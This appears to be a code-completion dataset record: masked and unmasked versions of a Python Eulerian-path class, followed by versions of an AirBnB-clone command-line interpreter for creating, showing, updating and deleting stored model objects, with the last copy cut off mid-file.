w.item:\n e = EulerianPath.EEdge(v, w.item)\n adj[v].append(e)\n adj[w.item].append(e)\n stack = deque()\n stack.append(s)\n while stack is not None:\n v = stack.pop()\n while adj[v] is not None:\n edge = adj[v].popleft()\n print(edge)\n if edge.get_is_used():\n continue\n edge._is_used = True\n stack.append(v)\n v = edge.other(v)\n self.get_path().append(v)\n if len(self.get_path()) != g.get_E() + 1:\n self._path = None\n\n def get_path(self):\n return self._path\n\n def path(self):\n yield from list(self.get_path())\n\n def has_eulerian_path(self):\n return self.get_path() is not None\n\n @staticmethod\n def __non_isolated_vertex(g):\n for v in range(g.get_V()):\n if g.degree(v) > 0:\n return v\n return -1\n\n def __repr__(self):\n return f'adj = {self.adj}, \\npath={self.get_path()}'\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass EulerianPath:\n _path = deque()\n\n\n class EEdge(Edge):\n\n def __init__(self, v=0, w=0, is_used=False):\n super().__init__(v, w)\n self._is_used = is_used\n\n def get_is_used(self):\n return self._is_used\n\n def __repr__(self):\n return (\n f'<{self.__class__.__name__}(v={super().get_v()}, w={super().get_w()}, weight={super().weight()}, _is_used={self.get_is_used()})>'\n )\n\n def __init__(self, g):\n self.g = g\n odd_degree_vertices = 0\n self.adj = deque()\n for v in range(g.get_V()):\n self.adj.append(EulerianPath.EEdge(v))\n s = EulerianPath.__non_isolated_vertex(g)\n for v in range(g.get_V()):\n if g.degree(v) % 2 != 0:\n odd_degree_vertices += 1\n s = v\n if odd_degree_vertices > 2:\n return\n if s == -1:\n s = 0\n adj = self.adj\n for v in range(g.get_V()):\n self_loops = 0\n for w in g.adj_vertices(v):\n if v == w.item:\n if self_loops % 2 == 0:\n e = EulerianPath.EEdge(v, w.item)\n adj[v].append(e)\n adj[w.item].append(e)\n self_loops += 1\n elif v < w.item:\n e = EulerianPath.EEdge(v, w.item)\n adj[v].append(e)\n adj[w.item].append(e)\n stack = deque()\n stack.append(s)\n while stack is not None:\n v = stack.pop()\n while adj[v] is not None:\n edge = adj[v].popleft()\n print(edge)\n if edge.get_is_used():\n continue\n edge._is_used = True\n stack.append(v)\n v = edge.other(v)\n self.get_path().append(v)\n if len(self.get_path()) != g.get_E() + 1:\n self._path = None\n\n def get_path(self):\n return self._path\n\n def path(self):\n yield from list(self.get_path())\n\n def has_eulerian_path(self):\n return self.get_path() is not None\n\n @staticmethod\n def __non_isolated_vertex(g):\n for v in range(g.get_V()):\n if g.degree(v) > 0:\n return v\n return -1\n\n def __repr__(self):\n return f'adj = {self.adj}, \\npath={self.get_path()}'\n\n\ndef main():\n g = Graph(13)\n with open('../resources/tinyG.txt') as f:\n for line in f.readlines():\n vertices = ' '.join(line.splitlines()).split(' ')\n if len(vertices) < 2:\n continue\n else:\n v1, v2 = int(vertices[0]), int(vertices[1])\n g.add_edge(v1, v2)\n print(g)\n euler = EulerianPath(g)\n print(euler)\n print('Eulerian path: ')\n if euler.has_eulerian_path():\n for v in euler.path():\n print(f'{v} ')\n print()\n else:\n print('None')\n print()\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "<mask token>\nfrom graphs.edge import Edge\nfrom graphs.graph import Graph\nfrom collections import deque, defaultdict\n\n\nclass EulerianPath:\n _path = deque()\n\n\n class EEdge(Edge):\n\n def __init__(self, v=0, w=0, is_used=False):\n super().__init__(v, w)\n self._is_used = is_used\n\n def get_is_used(self):\n return self._is_used\n\n def __repr__(self):\n return (\n f'<{self.__class__.__name__}(v={super().get_v()}, w={super().get_w()}, weight={super().weight()}, _is_used={self.get_is_used()})>'\n )\n\n def __init__(self, g):\n self.g = g\n odd_degree_vertices = 0\n self.adj = deque()\n for v in range(g.get_V()):\n self.adj.append(EulerianPath.EEdge(v))\n s = EulerianPath.__non_isolated_vertex(g)\n for v in range(g.get_V()):\n if g.degree(v) % 2 != 0:\n odd_degree_vertices += 1\n s = v\n if odd_degree_vertices > 2:\n return\n if s == -1:\n s = 0\n adj = self.adj\n for v in range(g.get_V()):\n self_loops = 0\n for w in g.adj_vertices(v):\n if v == w.item:\n if self_loops % 2 == 0:\n e = EulerianPath.EEdge(v, w.item)\n adj[v].append(e)\n adj[w.item].append(e)\n self_loops += 1\n elif v < w.item:\n e = EulerianPath.EEdge(v, w.item)\n adj[v].append(e)\n adj[w.item].append(e)\n stack = deque()\n stack.append(s)\n while stack is not None:\n v = stack.pop()\n while adj[v] is not None:\n edge = adj[v].popleft()\n print(edge)\n if edge.get_is_used():\n continue\n edge._is_used = True\n stack.append(v)\n v = edge.other(v)\n self.get_path().append(v)\n if len(self.get_path()) != g.get_E() + 1:\n self._path = None\n\n def get_path(self):\n return self._path\n\n def path(self):\n yield from list(self.get_path())\n\n def has_eulerian_path(self):\n return self.get_path() is not None\n\n @staticmethod\n def __non_isolated_vertex(g):\n for v in range(g.get_V()):\n if g.degree(v) > 0:\n return v\n return -1\n\n def __repr__(self):\n return f'adj = {self.adj}, \\npath={self.get_path()}'\n\n\ndef main():\n g = Graph(13)\n with open('../resources/tinyG.txt') as f:\n for line in f.readlines():\n vertices = ' '.join(line.splitlines()).split(' ')\n if len(vertices) < 2:\n continue\n else:\n v1, v2 = int(vertices[0]), int(vertices[1])\n g.add_edge(v1, v2)\n print(g)\n euler = EulerianPath(g)\n print(euler)\n print('Eulerian path: ')\n if euler.has_eulerian_path():\n for v in euler.path():\n print(f'{v} ')\n print()\n else:\n print('None')\n print()\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "\"\"\"\neulerian_path.py\nAn Eulerian path, also called an Euler chain, Euler trail, Euler walk, or \"Eulerian\" version of any of these\nvariants, is a walk on the graph edges of a graph which uses each graph edge in the original graph exactly once.\nA connected graph has an Eulerian path iff it has at most two graph vertices of odd degree.\n\nThe EulerianPath class represents a data type\n * for finding an Eulerian path in a graph.\n * An Eulerian path is a path (not necessarily simple) that\n * uses every edge in the graph exactly once.\n * This implementation uses a non-recursive depth-first search.\n * The constructor takes Theta(E + V) time in the worst\n * case, where E is the number of edges and V is\n * the number of vertices.\n * Each instance method takes Theta(1) time.\n * It uses Theta(E + V) extra space in the worst case\n * (not including the digraph).\n\"\"\"\nfrom graphs.edge import Edge\nfrom graphs.graph import Graph\nfrom collections import deque, defaultdict\n\n\nclass EulerianPath:\n\n _path = deque() # stack\n\n class EEdge(Edge):\n\n def __init__(self, v=0, w=0, is_used=False):\n super().__init__(v, w)\n self._is_used = is_used\n\n def get_is_used(self):\n return self._is_used\n\n def __repr__(self):\n return f'<{self.__class__.__name__}(' \\\n f'v={super().get_v()}, ' \\\n f'w={super().get_w()}, ' \\\n f'weight={super().weight()}, ' \\\n f'_is_used={self.get_is_used()})>'\n\n def __init__(self, g):\n # find vertex from which to start potential Eulerian path:\n # a vertex v with odd degree(v) if it exits;\n # otherwise a vertex with degree(v) > 0\n self.g = g\n odd_degree_vertices = 0\n self.adj = deque()\n for v in range(g.get_V()):\n self.adj.append(EulerianPath.EEdge(v))\n s = EulerianPath.__non_isolated_vertex(g)\n for v in range(g.get_V()):\n if g.degree(v) % 2 != 0:\n odd_degree_vertices += 1\n s = v\n # Eulerian path iff it has at most two graph vertices of odd degree\n if odd_degree_vertices > 2:\n return\n # special case for graph with 0 edges (has a degenerate Eulerian Path)\n if s == -1:\n s = 0\n\n adj = self.adj\n for v in range(g.get_V()):\n self_loops = 0\n for w in g.adj_vertices(v):\n # careful with self loops\n if v == w.item:\n if self_loops % 2 == 0:\n e = EulerianPath.EEdge(v, w.item)\n adj[v].append(e)\n adj[w.item].append(e)\n self_loops += 1\n elif v < w.item:\n e = EulerianPath.EEdge(v, w.item)\n adj[v].append(e)\n adj[w.item].append(e)\n stack = deque()\n stack.append(s)\n # greedily search through edges in iterative DFS style\n while stack is not None:\n v = stack.pop()\n while adj[v] is not None:\n edge = adj[v].popleft()\n print(edge)\n if edge.get_is_used():\n continue\n edge._is_used = True\n stack.append(v)\n v = edge.other(v)\n # push vertex with no more leaving edges to path\n self.get_path().append(v)\n\n # check if all edges are used\n if len(self.get_path()) != g.get_E() + 1:\n self._path = None\n\n def get_path(self):\n return self._path\n\n def path(self):\n yield from list(self.get_path())\n\n def has_eulerian_path(self):\n return self.get_path() is not None\n\n @staticmethod\n def __non_isolated_vertex(g):\n for v in range(g.get_V()):\n if g.degree(v) > 0:\n return v\n return -1\n\n def __repr__(self):\n return f'adj = {self.adj}, \\n' \\\n f'path={self.get_path()}'\n\n\ndef main():\n g = Graph(13)\n with open(\"../resources/tinyG.txt\", ) as f:\n for line in f.readlines():\n vertices = \" \".join(line.splitlines()).split(' ')\n if len(vertices) < 2:\n continue\n else:\n v1, v2 = int(vertices[0]), int(vertices[1])\n g.add_edge(v1, v2)\n print(g)\n euler = EulerianPath(g)\n print(euler)\n print('Eulerian path: ')\n if euler.has_eulerian_path():\n for v in euler.path():\n print(f'{v} ')\n print()\n else:\n print('None')\n print()\n\n\nif __name__ == '__main__':\n main()\n\n\n",
"step-ids": [
7,
8,
10,
11,
12
]
}
|
[
7,
8,
10,
11,
12
] |
#!/usr/bin/python3
"""
program of the command interpreter
"""
import cmd
import models
import re
from models.base_model import BaseModel
from models import storage
from models.user import User
from models.state import State
from models.city import City
from models.amenity import Amenity
from models.place import Place
from models.review import Review
class HBNBCommand(cmd.Cmd):
""" This class to setup the command interpreter """
__DCT_CLS = {
"BaseModel": BaseModel,
"User": User,
"State": State,
"City": City,
"Amenity": Amenity,
"Place": Place,
"Review": Review
}
prompt = "(hbnb) "
def do_quit(self, line):
'''Exit the CMD program'''
return True
def do_EOF(self, line):
'''Exit the CMD program'''
return True
def emptyline(self):
'''Do nothing'''
pass
def do_create(self, line):
'''Creates a new instance of BaseModel'''
arg_line = line.split()
if line == "":
print("** class name missing **")
return False
elif arg_line[0] not in self.__DCT_CLS:
print("** class doesn't exist **")
else:
new_instance = self.__DCT_CLS[arg_line[0]]()
print(new_instance.id)
new_instance.save()
def do_show(self, line):
if (type(line) == str):
arg_line = line.split()
len_args = len(arg_line)
if (self.check_if_created(arg_line, len_args) != 1):
get_inst = arg_line[0] + "." + arg_line[1]
dict_classes = models.storage.all()
if get_inst in dict_classes.keys():
print(dict_classes[get_inst])
else:
print("** no instance found **")
else:
srch_id = line[0] + "." + line[1]
dict_classes = models.storage.all()
if srch_id in dict_classes.keys():
print(dict_classes[srch_id])
else:
print("** no instance found **")
def do_destroy(self, line):
arg_line = line.split()
len_args = len(arg_line)
if (self.check_if_created(arg_line, len_args) != 1):
get_inst = arg_line[0] + "." + arg_line[1]
dict_classes = models.storage.all()
if get_inst in dict_classes.keys():
del dict_classes[get_inst]
models.storage.save()
else:
print("** no instance found **")
def do_all(self, line):
arg_line = line.split()
if line == "" or arg_line[0] in self.__DCT_CLS:
dir_classes = models.storage.all()
list_classes = []
for key, value in dir_classes.items():
if line in key:
list_classes.append(value.__str__())
print(list_classes)
else:
print("** class doesn't exist **")
def do_update(self, line):
arg_line = line.split()
len_args = len(arg_line)
if (self.check_if_created(arg_line, len_args) == 1):
pass
elif (len_args == 2):
print("** attribute name missing **")
elif (len_args == 3):
print("** value missing **")
else:
get_inst = arg_line[0] + "." + arg_line[1]
dict_classes = models.storage.all()
if get_inst in dict_classes.keys():
if arg_line[3]:
arg_line[3] = arg_line[3].replace('"', "")
try:
arg_line[3] = int(arg_line[3])
except ValueError:
try:
arg_line[3] = float(arg_line[3])
except ValueError:
arg_line[3] = arg_line[3]
dict_classes[get_inst].__dict__[arg_line[2]] = arg_line[3]
dict_classes[get_inst].save()
else:
print("** no instance found **")
def default(self, line):
'''all method names that aren't defined'''
args_line = line.split('.')
if len(args_line) > 1:
if args_line[1] == "all()":
self.do_all(args_line[0])
if args_line[1] == "count()":
self.do_count(args_line[0])
my_count = args_line[1].split('"')
res = re.findall(r'\(.*?\)', args_line[1])
my_count[0] = my_count[0] + line[-1]
if my_count[0] == "show()":
myNewList = [args_line[0], my_count[1]]
self.do_show(myNewList)
else:
cmd.Cmd.default(self, line)
def check_if_created(self, arg_line, len_args):
'''Verifies if class exists'''
if len_args == 0:
print("** class name missing **")
return 1
elif arg_line[0] not in self.__DCT_CLS:
print("** class doesn't exist **")
return 1
elif (len_args == 1):
print("** instance id missing **")
return 1
def do_count(self, line):
'''Counts the number of existing instances'''
arg_line = line.split()
if line == "" or arg_line[0] in self.__DCT_CLS:
dir_classes = models.storage.all()
list_classes = []
count = 0
for key, value in dir_classes.items():
if line in key:
list_classes.append(value.__str__())
count += 1
print(count)
else:
print("** class doesn't exist **")
if __name__ == "__main__":
HBNBCommand().cmdloop()
|
normal
|
{
"blob_id": "7cbf2082d530c315fdcfdb94f5c6ac4755ea2081",
"index": 1267,
"step-1": "<mask token>\n\n\nclass HBNBCommand(cmd.Cmd):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def emptyline(self):\n \"\"\"Do nothing\"\"\"\n pass\n\n def do_create(self, line):\n \"\"\"Creates a new instance of BaseModel\"\"\"\n arg_line = line.split()\n if line == '':\n print('** class name missing **')\n return False\n elif arg_line[0] not in self.__DCT_CLS:\n print(\"** class doesn't exist **\")\n else:\n new_instance = self.__DCT_CLS[arg_line[0]]()\n print(new_instance.id)\n new_instance.save()\n\n def do_show(self, line):\n if type(line) == str:\n arg_line = line.split()\n len_args = len(arg_line)\n if self.check_if_created(arg_line, len_args) != 1:\n get_inst = arg_line[0] + '.' + arg_line[1]\n dict_classes = models.storage.all()\n if get_inst in dict_classes.keys():\n print(dict_classes[get_inst])\n else:\n print('** no instance found **')\n else:\n srch_id = line[0] + '.' + line[1]\n dict_classes = models.storage.all()\n if srch_id in dict_classes.keys():\n print(dict_classes[srch_id])\n else:\n print('** no instance found **')\n\n def do_destroy(self, line):\n arg_line = line.split()\n len_args = len(arg_line)\n if self.check_if_created(arg_line, len_args) != 1:\n get_inst = arg_line[0] + '.' + arg_line[1]\n dict_classes = models.storage.all()\n if get_inst in dict_classes.keys():\n del dict_classes[get_inst]\n models.storage.save()\n else:\n print('** no instance found **')\n\n def do_all(self, line):\n arg_line = line.split()\n if line == '' or arg_line[0] in self.__DCT_CLS:\n dir_classes = models.storage.all()\n list_classes = []\n for key, value in dir_classes.items():\n if line in key:\n list_classes.append(value.__str__())\n print(list_classes)\n else:\n print(\"** class doesn't exist **\")\n\n def do_update(self, line):\n arg_line = line.split()\n len_args = len(arg_line)\n if self.check_if_created(arg_line, len_args) == 1:\n pass\n elif len_args == 2:\n print('** attribute name missing **')\n elif len_args == 3:\n print('** value missing **')\n else:\n get_inst = arg_line[0] + '.' + arg_line[1]\n dict_classes = models.storage.all()\n if get_inst in dict_classes.keys():\n if arg_line[3]:\n arg_line[3] = arg_line[3].replace('\"', '')\n try:\n arg_line[3] = int(arg_line[3])\n except ValueError:\n try:\n arg_line[3] = float(arg_line[3])\n except ValueError:\n arg_line[3] = arg_line[3]\n dict_classes[get_inst].__dict__[arg_line[2]] = arg_line[3]\n dict_classes[get_inst].save()\n else:\n print('** no instance found **')\n <mask token>\n\n def check_if_created(self, arg_line, len_args):\n \"\"\"Verifies if class exists\"\"\"\n if len_args == 0:\n print('** class name missing **')\n return 1\n elif arg_line[0] not in self.__DCT_CLS:\n print(\"** class doesn't exist **\")\n return 1\n elif len_args == 1:\n print('** instance id missing **')\n return 1\n\n def do_count(self, line):\n \"\"\"Counts the number of existing instances\"\"\"\n arg_line = line.split()\n if line == '' or arg_line[0] in self.__DCT_CLS:\n dir_classes = models.storage.all()\n list_classes = []\n count = 0\n for key, value in dir_classes.items():\n if line in key:\n list_classes.append(value.__str__())\n count += 1\n print(count)\n else:\n print(\"** class doesn't exist **\")\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass HBNBCommand(cmd.Cmd):\n <mask token>\n <mask token>\n <mask token>\n\n def do_quit(self, line):\n \"\"\"Exit the CMD program\"\"\"\n return True\n <mask token>\n\n def emptyline(self):\n \"\"\"Do nothing\"\"\"\n pass\n\n def do_create(self, line):\n \"\"\"Creates a new instance of BaseModel\"\"\"\n arg_line = line.split()\n if line == '':\n print('** class name missing **')\n return False\n elif arg_line[0] not in self.__DCT_CLS:\n print(\"** class doesn't exist **\")\n else:\n new_instance = self.__DCT_CLS[arg_line[0]]()\n print(new_instance.id)\n new_instance.save()\n\n def do_show(self, line):\n if type(line) == str:\n arg_line = line.split()\n len_args = len(arg_line)\n if self.check_if_created(arg_line, len_args) != 1:\n get_inst = arg_line[0] + '.' + arg_line[1]\n dict_classes = models.storage.all()\n if get_inst in dict_classes.keys():\n print(dict_classes[get_inst])\n else:\n print('** no instance found **')\n else:\n srch_id = line[0] + '.' + line[1]\n dict_classes = models.storage.all()\n if srch_id in dict_classes.keys():\n print(dict_classes[srch_id])\n else:\n print('** no instance found **')\n\n def do_destroy(self, line):\n arg_line = line.split()\n len_args = len(arg_line)\n if self.check_if_created(arg_line, len_args) != 1:\n get_inst = arg_line[0] + '.' + arg_line[1]\n dict_classes = models.storage.all()\n if get_inst in dict_classes.keys():\n del dict_classes[get_inst]\n models.storage.save()\n else:\n print('** no instance found **')\n\n def do_all(self, line):\n arg_line = line.split()\n if line == '' or arg_line[0] in self.__DCT_CLS:\n dir_classes = models.storage.all()\n list_classes = []\n for key, value in dir_classes.items():\n if line in key:\n list_classes.append(value.__str__())\n print(list_classes)\n else:\n print(\"** class doesn't exist **\")\n\n def do_update(self, line):\n arg_line = line.split()\n len_args = len(arg_line)\n if self.check_if_created(arg_line, len_args) == 1:\n pass\n elif len_args == 2:\n print('** attribute name missing **')\n elif len_args == 3:\n print('** value missing **')\n else:\n get_inst = arg_line[0] + '.' + arg_line[1]\n dict_classes = models.storage.all()\n if get_inst in dict_classes.keys():\n if arg_line[3]:\n arg_line[3] = arg_line[3].replace('\"', '')\n try:\n arg_line[3] = int(arg_line[3])\n except ValueError:\n try:\n arg_line[3] = float(arg_line[3])\n except ValueError:\n arg_line[3] = arg_line[3]\n dict_classes[get_inst].__dict__[arg_line[2]] = arg_line[3]\n dict_classes[get_inst].save()\n else:\n print('** no instance found **')\n\n def default(self, line):\n \"\"\"all method names that aren't defined\"\"\"\n args_line = line.split('.')\n if len(args_line) > 1:\n if args_line[1] == 'all()':\n self.do_all(args_line[0])\n if args_line[1] == 'count()':\n self.do_count(args_line[0])\n my_count = args_line[1].split('\"')\n res = re.findall('\\\\(.*?\\\\)', args_line[1])\n my_count[0] = my_count[0] + line[-1]\n if my_count[0] == 'show()':\n myNewList = [args_line[0], my_count[1]]\n self.do_show(myNewList)\n else:\n cmd.Cmd.default(self, line)\n\n def check_if_created(self, arg_line, len_args):\n \"\"\"Verifies if class exists\"\"\"\n if len_args == 0:\n print('** class name missing **')\n return 1\n elif arg_line[0] not in self.__DCT_CLS:\n print(\"** class doesn't exist **\")\n return 1\n elif len_args == 1:\n print('** instance id missing **')\n return 1\n\n def do_count(self, line):\n \"\"\"Counts the number of existing instances\"\"\"\n arg_line = line.split()\n if line == '' or arg_line[0] in self.__DCT_CLS:\n dir_classes = models.storage.all()\n list_classes = []\n count = 0\n for key, value in dir_classes.items():\n if line in key:\n list_classes.append(value.__str__())\n count += 1\n print(count)\n else:\n print(\"** class doesn't exist **\")\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass HBNBCommand(cmd.Cmd):\n <mask token>\n <mask token>\n <mask token>\n\n def do_quit(self, line):\n \"\"\"Exit the CMD program\"\"\"\n return True\n\n def do_EOF(self, line):\n \"\"\"Exit the CMD program\"\"\"\n return True\n\n def emptyline(self):\n \"\"\"Do nothing\"\"\"\n pass\n\n def do_create(self, line):\n \"\"\"Creates a new instance of BaseModel\"\"\"\n arg_line = line.split()\n if line == '':\n print('** class name missing **')\n return False\n elif arg_line[0] not in self.__DCT_CLS:\n print(\"** class doesn't exist **\")\n else:\n new_instance = self.__DCT_CLS[arg_line[0]]()\n print(new_instance.id)\n new_instance.save()\n\n def do_show(self, line):\n if type(line) == str:\n arg_line = line.split()\n len_args = len(arg_line)\n if self.check_if_created(arg_line, len_args) != 1:\n get_inst = arg_line[0] + '.' + arg_line[1]\n dict_classes = models.storage.all()\n if get_inst in dict_classes.keys():\n print(dict_classes[get_inst])\n else:\n print('** no instance found **')\n else:\n srch_id = line[0] + '.' + line[1]\n dict_classes = models.storage.all()\n if srch_id in dict_classes.keys():\n print(dict_classes[srch_id])\n else:\n print('** no instance found **')\n\n def do_destroy(self, line):\n arg_line = line.split()\n len_args = len(arg_line)\n if self.check_if_created(arg_line, len_args) != 1:\n get_inst = arg_line[0] + '.' + arg_line[1]\n dict_classes = models.storage.all()\n if get_inst in dict_classes.keys():\n del dict_classes[get_inst]\n models.storage.save()\n else:\n print('** no instance found **')\n\n def do_all(self, line):\n arg_line = line.split()\n if line == '' or arg_line[0] in self.__DCT_CLS:\n dir_classes = models.storage.all()\n list_classes = []\n for key, value in dir_classes.items():\n if line in key:\n list_classes.append(value.__str__())\n print(list_classes)\n else:\n print(\"** class doesn't exist **\")\n\n def do_update(self, line):\n arg_line = line.split()\n len_args = len(arg_line)\n if self.check_if_created(arg_line, len_args) == 1:\n pass\n elif len_args == 2:\n print('** attribute name missing **')\n elif len_args == 3:\n print('** value missing **')\n else:\n get_inst = arg_line[0] + '.' + arg_line[1]\n dict_classes = models.storage.all()\n if get_inst in dict_classes.keys():\n if arg_line[3]:\n arg_line[3] = arg_line[3].replace('\"', '')\n try:\n arg_line[3] = int(arg_line[3])\n except ValueError:\n try:\n arg_line[3] = float(arg_line[3])\n except ValueError:\n arg_line[3] = arg_line[3]\n dict_classes[get_inst].__dict__[arg_line[2]] = arg_line[3]\n dict_classes[get_inst].save()\n else:\n print('** no instance found **')\n\n def default(self, line):\n \"\"\"all method names that aren't defined\"\"\"\n args_line = line.split('.')\n if len(args_line) > 1:\n if args_line[1] == 'all()':\n self.do_all(args_line[0])\n if args_line[1] == 'count()':\n self.do_count(args_line[0])\n my_count = args_line[1].split('\"')\n res = re.findall('\\\\(.*?\\\\)', args_line[1])\n my_count[0] = my_count[0] + line[-1]\n if my_count[0] == 'show()':\n myNewList = [args_line[0], my_count[1]]\n self.do_show(myNewList)\n else:\n cmd.Cmd.default(self, line)\n\n def check_if_created(self, arg_line, len_args):\n \"\"\"Verifies if class exists\"\"\"\n if len_args == 0:\n print('** class name missing **')\n return 1\n elif arg_line[0] not in self.__DCT_CLS:\n print(\"** class doesn't exist **\")\n return 1\n elif len_args == 1:\n print('** instance id missing **')\n return 1\n\n def do_count(self, line):\n \"\"\"Counts the number of existing instances\"\"\"\n arg_line = line.split()\n if line == '' or arg_line[0] in self.__DCT_CLS:\n dir_classes = models.storage.all()\n list_classes = []\n count = 0\n for key, value in dir_classes.items():\n if line in key:\n list_classes.append(value.__str__())\n count += 1\n print(count)\n else:\n print(\"** class doesn't exist **\")\n\n\n<mask token>\n",
"step-4": "<mask token>\nimport cmd\nimport models\nimport re\nfrom models.base_model import BaseModel\nfrom models import storage\nfrom models.user import User\nfrom models.state import State\nfrom models.city import City\nfrom models.amenity import Amenity\nfrom models.place import Place\nfrom models.review import Review\n\n\nclass HBNBCommand(cmd.Cmd):\n \"\"\" This class to setup the command interpreter \"\"\"\n __DCT_CLS = {'BaseModel': BaseModel, 'User': User, 'State': State,\n 'City': City, 'Amenity': Amenity, 'Place': Place, 'Review': Review}\n prompt = '(hbnb) '\n\n def do_quit(self, line):\n \"\"\"Exit the CMD program\"\"\"\n return True\n\n def do_EOF(self, line):\n \"\"\"Exit the CMD program\"\"\"\n return True\n\n def emptyline(self):\n \"\"\"Do nothing\"\"\"\n pass\n\n def do_create(self, line):\n \"\"\"Creates a new instance of BaseModel\"\"\"\n arg_line = line.split()\n if line == '':\n print('** class name missing **')\n return False\n elif arg_line[0] not in self.__DCT_CLS:\n print(\"** class doesn't exist **\")\n else:\n new_instance = self.__DCT_CLS[arg_line[0]]()\n print(new_instance.id)\n new_instance.save()\n\n def do_show(self, line):\n if type(line) == str:\n arg_line = line.split()\n len_args = len(arg_line)\n if self.check_if_created(arg_line, len_args) != 1:\n get_inst = arg_line[0] + '.' + arg_line[1]\n dict_classes = models.storage.all()\n if get_inst in dict_classes.keys():\n print(dict_classes[get_inst])\n else:\n print('** no instance found **')\n else:\n srch_id = line[0] + '.' + line[1]\n dict_classes = models.storage.all()\n if srch_id in dict_classes.keys():\n print(dict_classes[srch_id])\n else:\n print('** no instance found **')\n\n def do_destroy(self, line):\n arg_line = line.split()\n len_args = len(arg_line)\n if self.check_if_created(arg_line, len_args) != 1:\n get_inst = arg_line[0] + '.' + arg_line[1]\n dict_classes = models.storage.all()\n if get_inst in dict_classes.keys():\n del dict_classes[get_inst]\n models.storage.save()\n else:\n print('** no instance found **')\n\n def do_all(self, line):\n arg_line = line.split()\n if line == '' or arg_line[0] in self.__DCT_CLS:\n dir_classes = models.storage.all()\n list_classes = []\n for key, value in dir_classes.items():\n if line in key:\n list_classes.append(value.__str__())\n print(list_classes)\n else:\n print(\"** class doesn't exist **\")\n\n def do_update(self, line):\n arg_line = line.split()\n len_args = len(arg_line)\n if self.check_if_created(arg_line, len_args) == 1:\n pass\n elif len_args == 2:\n print('** attribute name missing **')\n elif len_args == 3:\n print('** value missing **')\n else:\n get_inst = arg_line[0] + '.' + arg_line[1]\n dict_classes = models.storage.all()\n if get_inst in dict_classes.keys():\n if arg_line[3]:\n arg_line[3] = arg_line[3].replace('\"', '')\n try:\n arg_line[3] = int(arg_line[3])\n except ValueError:\n try:\n arg_line[3] = float(arg_line[3])\n except ValueError:\n arg_line[3] = arg_line[3]\n dict_classes[get_inst].__dict__[arg_line[2]] = arg_line[3]\n dict_classes[get_inst].save()\n else:\n print('** no instance found **')\n\n def default(self, line):\n \"\"\"all method names that aren't defined\"\"\"\n args_line = line.split('.')\n if len(args_line) > 1:\n if args_line[1] == 'all()':\n self.do_all(args_line[0])\n if args_line[1] == 'count()':\n self.do_count(args_line[0])\n my_count = args_line[1].split('\"')\n res = re.findall('\\\\(.*?\\\\)', args_line[1])\n my_count[0] = my_count[0] + line[-1]\n if my_count[0] == 'show()':\n myNewList = [args_line[0], my_count[1]]\n self.do_show(myNewList)\n else:\n cmd.Cmd.default(self, line)\n\n def check_if_created(self, arg_line, len_args):\n \"\"\"Verifies if class exists\"\"\"\n if len_args == 0:\n print('** class name missing **')\n return 1\n elif arg_line[0] not in self.__DCT_CLS:\n print(\"** class doesn't exist **\")\n return 1\n elif len_args == 1:\n print('** instance id missing **')\n return 1\n\n def do_count(self, line):\n \"\"\"Counts the number of existing instances\"\"\"\n arg_line = line.split()\n if line == '' or arg_line[0] in self.__DCT_CLS:\n dir_classes = models.storage.all()\n list_classes = []\n count = 0\n for key, value in dir_classes.items():\n if line in key:\n list_classes.append(value.__str__())\n count += 1\n print(count)\n else:\n print(\"** class doesn't exist **\")\n\n\nif __name__ == '__main__':\n HBNBCommand().cmdloop()\n",
"step-5": "#!/usr/bin/python3\n\"\"\"\nprogram of the command interpreter\n\"\"\"\n\nimport cmd\nimport models\nimport re\nfrom models.base_model import BaseModel\nfrom models import storage\nfrom models.user import User\nfrom models.state import State\nfrom models.city import City\nfrom models.amenity import Amenity\nfrom models.place import Place\nfrom models.review import Review\n\n\nclass HBNBCommand(cmd.Cmd):\n \"\"\" This class to setup the command interpreter \"\"\"\n __DCT_CLS = {\n \"BaseModel\": BaseModel,\n \"User\": User,\n \"State\": State,\n \"City\": City,\n \"Amenity\": Amenity,\n \"Place\": Place,\n \"Review\": Review\n }\n prompt = \"(hbnb) \"\n\n def do_quit(self, line):\n '''Exit the CMD program'''\n return True\n\n def do_EOF(self, line):\n '''Exit the CMD program'''\n return True\n\n def emptyline(self):\n '''Do nothing'''\n pass\n\n def do_create(self, line):\n '''Creates a new instance of BaseModel'''\n arg_line = line.split()\n\n if line == \"\":\n print(\"** class name missing **\")\n return False\n elif arg_line[0] not in self.__DCT_CLS:\n print(\"** class doesn't exist **\")\n else:\n new_instance = self.__DCT_CLS[arg_line[0]]()\n print(new_instance.id)\n new_instance.save()\n\n def do_show(self, line):\n if (type(line) == str):\n arg_line = line.split()\n len_args = len(arg_line)\n\n if (self.check_if_created(arg_line, len_args) != 1):\n\n get_inst = arg_line[0] + \".\" + arg_line[1]\n dict_classes = models.storage.all()\n\n if get_inst in dict_classes.keys():\n print(dict_classes[get_inst])\n else:\n print(\"** no instance found **\")\n else:\n srch_id = line[0] + \".\" + line[1]\n dict_classes = models.storage.all()\n if srch_id in dict_classes.keys():\n print(dict_classes[srch_id])\n else:\n print(\"** no instance found **\")\n\n def do_destroy(self, line):\n arg_line = line.split()\n len_args = len(arg_line)\n if (self.check_if_created(arg_line, len_args) != 1):\n\n get_inst = arg_line[0] + \".\" + arg_line[1]\n dict_classes = models.storage.all()\n\n if get_inst in dict_classes.keys():\n del dict_classes[get_inst]\n models.storage.save()\n else:\n print(\"** no instance found **\")\n\n def do_all(self, line):\n arg_line = line.split()\n if line == \"\" or arg_line[0] in self.__DCT_CLS:\n dir_classes = models.storage.all()\n list_classes = []\n for key, value in dir_classes.items():\n if line in key:\n list_classes.append(value.__str__())\n print(list_classes)\n else:\n print(\"** class doesn't exist **\")\n\n def do_update(self, line):\n arg_line = line.split()\n len_args = len(arg_line)\n\n if (self.check_if_created(arg_line, len_args) == 1):\n pass\n elif (len_args == 2):\n print(\"** attribute name missing **\")\n elif (len_args == 3):\n print(\"** value missing **\")\n else:\n get_inst = arg_line[0] + \".\" + arg_line[1]\n dict_classes = models.storage.all()\n if get_inst in dict_classes.keys():\n if arg_line[3]:\n arg_line[3] = arg_line[3].replace('\"', \"\")\n try:\n arg_line[3] = int(arg_line[3])\n except ValueError:\n try:\n arg_line[3] = float(arg_line[3])\n except ValueError:\n arg_line[3] = arg_line[3]\n 